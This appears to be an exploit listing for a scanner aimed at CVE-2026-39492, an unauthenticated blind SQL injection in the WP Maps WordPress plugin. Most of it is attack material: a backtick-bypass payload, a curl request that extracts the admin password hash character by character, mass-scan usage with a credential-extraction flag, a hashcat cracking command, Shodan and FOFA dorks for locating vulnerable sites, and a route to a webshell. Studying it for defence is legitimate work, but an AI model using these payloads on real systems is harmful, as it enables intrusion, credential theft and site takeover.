Share
## https://sploitus.com/exploit?id=C6267772-8D88-57ED-80ED-6E28C1C86040
CVE-2026-39492 โ€” WP Maps Blind SQL Injection Scanner
Pre-Auth Time-Based Blind SQLi via Backtick Bypass โ†’ DB Extraction

---

## Overview

**CVE-2026-39492** is a critical-severity (CVSS 9.3) unauthenticated blind SQL injection vulnerability in the **WP Maps** plugin (wp-google-map-plugin) versions **โ‰ค 4.9.1**.

The `wpgmp_ajax_call` AJAX handler is registered via `wp_ajax_nopriv_` for unauthenticated access. The `location_id` parameter is passed through `FlipperCode_Model_Base::is_column()` โ€” a function that incorrectly treats **backtick-wrapped input** as a trusted SQL column identifier, completely bypassing WordPress's `esc_sql()` sanitization.

### Affected Versions

| WP Maps Version | Status |
|---|---|
| โ‰ค 4.9.1 | Vulnerable |
| โ‰ฅ 4.9.2 | Patched |

> **Active installs:** 100,000+

---

## Vulnerability Mechanism

### Root Cause

In the plugin's database abstraction layer, `is_column()` checks if user input is wrapped in backticks:

```php
// Vulnerable: backtick-wrapped input treated as trusted column identifier
function is_column($value) {
    if (preg_match('/^`.*`$/', $value)) {
        return true;  // bypasses esc_sql() entirely!
    }
    return false;
}
```

When `is_column()` returns `true`, the input is passed directly to the SQL query without `esc_sql()` escaping. This allows:

```
location_id=`1` AND SLEEP(5) AND `1`=`1
```

### Attack Flow

```
1. Detect WP Maps via readme.txt โ†’ extract version
2. POST to /wp-admin/admin-ajax.php?action=wpgmp_ajax_call
3. Inject backtick-wrapped payload in location_id parameter
4. Measure response time โ€” SLEEP(N) confirms SQL injection
5. Extract data via boolean/time-based blind technique
```

### Why CVSS 9.3

| Metric | Value |
|---|---|
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Scope | Changed (impacts entire DB) |
| Confidentiality | High |
| Integrity | None |
| Availability | Low |

---

## Installation

```bash
git clone https://github.com/shinthink/CVE-2026-39492.git
cd CVE-2026-39492
pip install -r requirements.txt
```

---

## Usage

```bash
# Single target detection
python cve_2026_39492.py -t target.com

# Mass scan
python cve_2026_39492.py -f targets.txt

# Mass scan + save results
python cve_2026_39492.py -f targets.txt -o sqli.txt

# Single target with credential extraction
python cve_2026_39492.py -t target.com --extract -v

# Verbose output
python cve_2026_39492.py -t target.com -v
```

### Arguments

```
  -t, --target      Single target (domain or IP)
  -f, --file        Target list, one per line
  -o, --output      Save vulnerable targets to file
  --threads         Concurrent workers (default: 20)
  --extract         Extract admin credentials from confirmed targets
  -v, --verbose     Show detailed output
```

---

## Proof of Concept

### Single Target

```bash
$ python cve_2026_39492.py -t target.com -v
```

```
  CVE-2026-39492 โ€” WP Maps Blind SQL Injection Scanner
  CVSS 9.3 | Pre-Auth | wpgmp_ajax_call โ†’ Backtick Bypass

  Target: WP Maps (wp-google-map-plugin)  5 seconds โ†’ VULNERABLE
```

**Step 3 โ€” Extract admin hash via blind SQLi**
```bash
# Check first character of admin hash
time curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=wpgmp_ajax_call' \
  -d 'location_id=`1` AND IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36,SLEEP(3),0) AND `1`=`1'

# Response > 3 seconds โ†’ first char is ASCII 36 = '$'
```

**Step 4 โ€” Crack hash & login โ†’ full RCE**
```bash
hashcat -m 400 -a 0 admin_hash.txt /usr/share/wordlists/rockyou.txt
```

---

## FOFA Dork

```
body="wp-google-map-plugin"
```

## Shodan

```
http.html:"wp-google-map-plugin"
```

---

## Impact

Successful exploitation allows extraction of the **entire WordPress database**:
- Admin password hashes โ†’ crack โ†’ admin login โ†’ plugin upload โ†’ RCE
- User PII, emails, session tokens
- API keys stored in wp_options
- If MySQL FILE privilege exists: `SELECT ... INTO OUTFILE` โ†’ webshell โ†’ direct RCE

---

## Disclaimer

> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
>
> This software is intended for security professionals conducting authorized penetration tests, organizations auditing their own infrastructure, and researchers studying vulnerability exploitation.
>
> Unauthorized access to computer systems is illegal and may violate:
> - United States: Computer Fraud and Abuse Act (18 U.S.C. 1030)
> - Indonesia: UU ITE Pasal 30 & 46
> - European Union: Directive 2013/40/EU
> - United Kingdom: Computer Misuse Act 1990
>
> The authors assume no liability for misuse.

---

## References

| Resource | Link |
|---|---|
| IONIX Advisory | [ionix.io/threat-center/cve-2026-39492](https://www.ionix.io/threat-center/cve-2026-39492/) |
| WPScan Advisory | [wpscan.com/vulnerability/c1f19d2e](https://wpscan.com/vulnerability/c1f19d2e-b28e-4962-951d-946b311fcd0b/) |
| Wordfence Advisory | [wordfence.com](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-map-plugin/wp-maps-store-locatorgoogle-mapsopenstreetmapmapboxlistingdirectory-filters-491-unauthenticated-sql-injection) |
| NVD Entry | [CVE-2026-39492](https://nvd.nist.gov/vuln/detail/CVE-2026-39492) |
| Plugin Trac | [wp-google-map-plugin](https://plugins.trac.wordpress.org/browser/wp-google-map-plugin/) |

---


  This project is not affiliated with Flipper Code or WP Maps.